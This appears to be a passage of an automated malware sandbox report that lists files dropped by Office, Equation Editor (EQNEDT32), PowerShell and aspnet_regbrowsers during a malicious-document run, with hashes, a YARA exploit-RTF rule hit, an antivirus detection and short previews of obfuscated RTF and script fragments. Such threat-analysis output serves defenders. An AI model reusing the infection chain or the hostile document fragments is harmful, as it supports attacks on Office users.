                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Rich Text Format data, version 1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):114813
                                                                                                                                                                                      Entropy (8bit):2.5107851272431225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:LhaJTzmiluIV44M4oQKuJJ7WtgBlIMvxZTzxxL9vRkHSM:qxuIV4T4obuOGWMpZBhFRK
                                                                                                                                                                                      MD5:0EC3C5F0AFB99AF55C463CD57D7EA776
                                                                                                                                                                                      SHA1:C8E0C437DBAB0C82EFA8BC71CB7CC5F165C2B813
                                                                                                                                                                                      SHA-256:34760DD3BC9F5A5E235D6DD938B4104C6EB29712CC981145B48E45CB9D60615F
                                                                                                                                                                                      SHA-512:FA376045B63850A7F1C8714A1D05D13D514D09A8D1D67C5E220678364D4954E62E31F0E798CA540B908C9362822DC60EDD1859AB303E3899C5912491383211F7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc, Author: ditekSHen
                                                                                                                                                                                      Preview:{\rtf1..{\*\hO40lRSUdAYZSeTzuRo1vLWrhJ3Eyfl6YWYs5Zig2xAuzTi687oz4eOsng17wmG3OxN0wP9fJO3eXUfIM2HnzroVGAuUimNPFboWpLU6UOVwe47Eb8WaENYQ8fzWo3sq9N9bInZearnyresZuImVKcOGT4ZLk2Yz7AfPsA8yehDsfdgxIRNimy7iGKu746CWCse46qyhho2odPK3oTYM9qWOZI}..{\706404085.77?.2|=%0.2+?;.%&1%4]%<?>:?*6?+)&3?^?!4%0.%?0/0]94:9/$.+=2!/?);'#6-?]6`3?4+?+,-4^_#1%9)99.^.0:'(*&$%(`)?!%'%[?&6;)?9|@3|23??9?>%!+?~.?,;*.?|*^?7-2]#.2$^&~,(_<<.[?,.'4%.<.5]/;1.0>>%5?97.`,&%,%2!3.(?]?(,9>|?5:),!..21?[..~-?</`=|%@,;>1=5'39/???9<'.343.4!?..5?`_%(5.:|6?&/*??>@.~#]+64^|!8./82#11'*27[?1?);')7|?#:%[>|<'4*#[97.^?'|$%?$].?.?<0%,!?6~.>2?@.-?:/?=.+.31?6;+<%@*~?+'0![48(-@]|.?<.*7?_&%[%.?'@;<);).759<&:;.>8`><:8?./&$_?=95-4%-?]/>$?(.<[%?>[/.>&?^<1+[@44882%`@0&-28==?![_...>+%&#9-%.9.>.'%[?%%63['4?!3&%'^=@%?(._]..'?=_(')?^@?*8_?>;&-6,=-26/86^%9||-^6?>`4!$|)7],%[#_.2,#~_:^/;;&?^!'.8?<>?84>%:>!;~.4.6.#|?&#9:.2^-+:'?.9($*64+4:>2.,??6@3*,)492@?#3?[?$.`4#$4~3(].:?=];.?%%+0,@?.9:&.%.8>,9?]+9(*?@.?)7.50_1*0+4)?#/!::%%@$.+?&=%*;1#5;<7?,~?~_^@|?8$?.%^21
                                                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):194546
                                                                                                                                                                                      Entropy (8bit):3.7308893365983766
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:NgVXBa4xg3NmKaba5Vxgt5pOGwWXgy7UjT/GZYmlcnrtIhv4t:Ng9Ba4x2Nm05l3yq5Iit
                                                                                                                                                                                      MD5:E649435AF0F3788A713CD22749FE6B38
                                                                                                                                                                                      SHA1:7D1BCBAD5F789C559E1E04F427F778446C0D6388
                                                                                                                                                                                      SHA-256:730B7357EF72D30C42DC3A32EC8E7E82303C40FB6056875E50DE4F644B0F06F3
                                                                                                                                                                                      SHA-512:B55E31EDEE1DC1FEF0A87F5D5B4B0D8D6CDCFAFAE89214B2C4D8F76CA26053C18B631E819DFC36F11A2380280ACB906F2207047057016E2AB5C8791947EB6A64
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .l.y.c.a.n.t.h.r.o.p.i.a.(.e.n.a.n.t.h.e.m.a.,. .p.r.e.s.s.u.r.o.s.o.,. .p.u.x.i.r.u.m.,. .s.e.m.i.l.o.u.r.o.,. .e.x.h.i.b.i.c.i.o.n.i.s.m.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.a.s.e.(.d.
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2342852
                                                                                                                                                                                      Entropy (8bit):2.6417290025884554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                                      MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                                      SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                                      SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                                      SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:Rich Text Format data, version 1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):114813
                                                                                                                                                                                      Entropy (8bit):2.5107851272431225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:LhaJTzmiluIV44M4oQKuJJ7WtgBlIMvxZTzxxL9vRkHSM:qxuIV4T4obuOGWMpZBhFRK
                                                                                                                                                                                      MD5:0EC3C5F0AFB99AF55C463CD57D7EA776
                                                                                                                                                                                      SHA1:C8E0C437DBAB0C82EFA8BC71CB7CC5F165C2B813
                                                                                                                                                                                      SHA-256:34760DD3BC9F5A5E235D6DD938B4104C6EB29712CC981145B48E45CB9D60615F
                                                                                                                                                                                      SHA-512:FA376045B63850A7F1C8714A1D05D13D514D09A8D1D67C5E220678364D4954E62E31F0E798CA540B908C9362822DC60EDD1859AB303E3899C5912491383211F7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6035E009.doc, Author: ditekSHen
                                                                                                                                                                                      Preview:{\rtf1..{\*\hO40lRSUdAYZSeTzuRo1vLWrhJ3Eyfl6YWYs5Zig2xAuzTi687oz4eOsng17wmG3OxN0wP9fJO3eXUfIM2HnzroVGAuUimNPFboWpLU6UOVwe47Eb8WaENYQ8fzWo3sq9N9bInZearnyresZuImVKcOGT4ZLk2Yz7AfPsA8yehDsfdgxIRNimy7iGKu746CWCse46qyhho2odPK3oTYM9qWOZI}..{\706404085.77?.2|=%0.2+?;.%&1%4]%<?>:?*6?+)&3?^?!4%0.%?0/0]94:9/$.+=2!/?);'#6-?]6`3?4+?+,-4^_#1%9)99.^.0:'(*&$%(`)?!%'%[?&6;)?9|@3|23??9?>%!+?~.?,;*.?|*^?7-2]#.2$^&~,(_<<.[?,.'4%.<.5]/;1.0>>%5?97.`,&%,%2!3.(?]?(,9>|?5:),!..21?[..~-?</`=|%@,;>1=5'39/???9<'.343.4!?..5?`_%(5.:|6?&/*??>@.~#]+64^|!8./82#11'*27[?1?);')7|?#:%[>|<'4*#[97.^?'|$%?$].?.?<0%,!?6~.>2?@.-?:/?=.+.31?6;+<%@*~?+'0![48(-@]|.?<.*7?_&%[%.?'@;<);).759<&:;.>8`><:8?./&$_?=95-4%-?]/>$?(.<[%?>[/.>&?^<1+[@44882%`@0&-28==?![_...>+%&#9-%.9.>.'%[?%%63['4?!3&%'^=@%?(._]..'?=_(')?^@?*8_?>;&-6,=-26/86^%9||-^6?>`4!$|)7],%[#_.2,#~_:^/;;&?^!'.8?<>?84>%:>!;~.4.6.#|?&#9:.2^-+:'?.9($*64+4:>2.,??6@3*,)492@?#3?[?$.`4#$4~3(].:?=];.?%%+0,@?.9:&.%.8>,9?]+9(*?@.?)7.50_1*0+4)?#/!::%%@$.+?&=%*;1#5;<7?,~?~_^@|?8$?.%^21
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):47296
                                                                                                                                                                                      Entropy (8bit):3.16059853246934
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:RYklAMoiRJRsHJaTXNazbtcXjRxV6NFHuvzaWKPoVItqUr:hTBQJeXNaz5Srsvu69tZr
                                                                                                                                                                                      MD5:3ABA86367362FEF04E75E5BA4DE0FED8
                                                                                                                                                                                      SHA1:BB58718E2FD7F29A4C27CD766B9E6D3BF942B130
                                                                                                                                                                                      SHA-256:9EA67BF12982DF8204F7C84E8DCA0D5C7FB2C1770A0D5156F5B6E356CD8CFAC9
                                                                                                                                                                                      SHA-512:C152E6EFC4A9D99F8AA223B50D8466191FF804A8987927F91B758D516D005D17B1698EA523BB9C65CF5997A188AD5CE933A124B9D4C5EB5AB9C15F882762EA2C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:....l...........N................@.._Y.. EMF........O.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................O.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.........H.......P.................E.....H.......H.......P.......7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i........................................................................................ D.w...........`.......X.......`.................E.....X.......X.......`.......7......................@.N..............C.a.l.i.b.r.i...........
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8084
                                                                                                                                                                                      Entropy (8bit):2.570503528684488
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
                                                                                                                                                                                      MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
                                                                                                                                                                                      SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
                                                                                                                                                                                      SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
                                                                                                                                                                                      SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2342852
                                                                                                                                                                                      Entropy (8bit):2.6417290025884554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                                      MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                                      SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                                      SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                                      SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):884312
                                                                                                                                                                                      Entropy (8bit):1.2944965349348616
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                                                                                                                                                      MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                                                                                                                                                      SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                                                                                                                                                      SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                                                                                                                                                      SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):76472
                                                                                                                                                                                      Entropy (8bit):3.025081600163608
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
                                                                                                                                                                                      MD5:A4B79FF3D7725F69AB98C49A72805D64
                                                                                                                                                                                      SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
                                                                                                                                                                                      SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
                                                                                                                                                                                      SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):38272
                                                                                                                                                                                      Entropy (8bit):2.8200425031385645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
                                                                                                                                                                                      MD5:C898CDC91D0BD5EFB41E576B8A19E931
                                                                                                                                                                                      SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
                                                                                                                                                                                      SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
                                                                                                                                                                                      SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                      Entropy (8bit):1.7991396786456761
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:5zG5MPoIarLEXat0uFgdQD8kMPzIaCLEXat0uFgdQD8:5bPoIogATrD81PzI1gATrD8
                                                                                                                                                                                      MD5:AB9C4C6FBB72F252746B266A3F6ED1ED
                                                                                                                                                                                      SHA1:4A1C82A02A7CE8431F927199CBB1294210B345AC
                                                                                                                                                                                      SHA-256:C9E3A21DACD1598900FA77CE8F8136A15ECEEACBF0253C48B75791CE33E7F257
                                                                                                                                                                                      SHA-512:72B00DA260696C12CF556AE556B21CB2674B1EE7C5F1B1CB677DFBEB7FF7C0D00121605B0AB55CDB313DF55F0DC7B1B4690C57D0AF68F69FA58C1BF02F794AFA
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                      Entropy (8bit):3.5535312038781326
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:RdkzU+Rzrknm8PjsVFGWPrHIE8bqhqoe5HHWIOeVz:4nzrknm0w3pX8OIoIH2IOmz
                                                                                                                                                                                      MD5:CA74C9AB4089C2AD6192B5DC7DCC27D9
                                                                                                                                                                                      SHA1:481F4897B6C6C678233D4C474DF3473C2DF40305
                                                                                                                                                                                      SHA-256:0F4E3D8AFA1A7F49300354ED748BC3CB6FDAFBE32833862E0AAB537CE2B9636A
                                                                                                                                                                                      SHA-512:79A4B5A3A6EBA9A346B01401CA87718C221BE0B4DD40BA815F5FE4A1D0C1939F69616357C8000B636FE6075354803CC0DC40ABD16837B1BDBE06E5633DB94857
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:0.6.4.0.4.0.8.5...7.7.?...2.|.=.%.0...2.+.?.;...%.&.1.%.4.].%.<.?.>.:.?.*.6.?.+.).&.3.?.^.?.!.4.%.0...%.?.0./.0.].9.4.:.9./.$...+.=.2.!./.?.).;.'.#.6.-.?.].6.`.3.?.4.+.?.+.,.-.4.^._.#.1.%.9.).9.9...^...0.:.'.(.*.&.$.%.(.`.).?.!.%.'.%.[.?.&.6.;.).?.9.|.@.3.|.2.3.?.?.9.?.>.%.!.+.?.~...?.,.;.*...?.|.*.^.?.7.-.2.].#...2.$.^.&.~.,.(._.<.<...[.?.,...'.4.%...<...5.]./.;.1...0.>.>.%.5.?.9.7...`.,.&.%.,.%.2.!.3...(.?.].?.(.,.9.>.|.?.5.:.).,.!.....2.1.?.[.....~.-.?.<./.`.=.|.%.@.,.;.>.1.=.5.'.3.9./.?.?.?.9.<.'...3.4.3...4.!.?.....5.?.`._.%.(.5...:.|.6.?.&./.*.?.?.>.@...~.#.].+.6.4.^.|.!.8.../.8.2.#.1.1.'.*.2.7.[.?.1.?.).;.'.).7.|.?.#.:.%.[.>.|.<.'.4.*.#.[.9.7...^.?.'.|.$.%.?.$.]...?...?.<.0.%.,.!.?.6.~...>.2.?.@...-.?.:./.?.=...+...3.1.?.6.;.+.<.%.@.*.~.?.+.'.0.!.[.4.8.(.-.@.].|...?.<...*.7.?._.&.%.[.%...?.'.@.;.<.).;.)...7.5.9.<.&.:.;...>.8.`.>.<.:.8.?.../.&.$._.?.=.9.5.-.4.%.-.?.]./.>.$.?.(...<.[.%.?.>.[./...>.&.?.^.<.1.+.[.@.4.4.8.8.2.%.`.@.0.&.-.2.8.=.=.?.!.[._.......>.+.%.&.#.9.-.%...9...>.
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:1
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:1
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:1
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:1
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1573
                                                                                                                                                                                      Entropy (8bit):5.099785731363393
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtW+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTzv
                                                                                                                                                                                      MD5:92A1BBEF9C072169FD9E433DB74C0402
                                                                                                                                                                                      SHA1:B3A9A853A46382E52A6EC05112FD9A8B90B2D41A
                                                                                                                                                                                      SHA-256:18316D6D89E8CEDBA21FD1D84290EA918B09CB1BF766BBBC31CBC8F10C5161B6
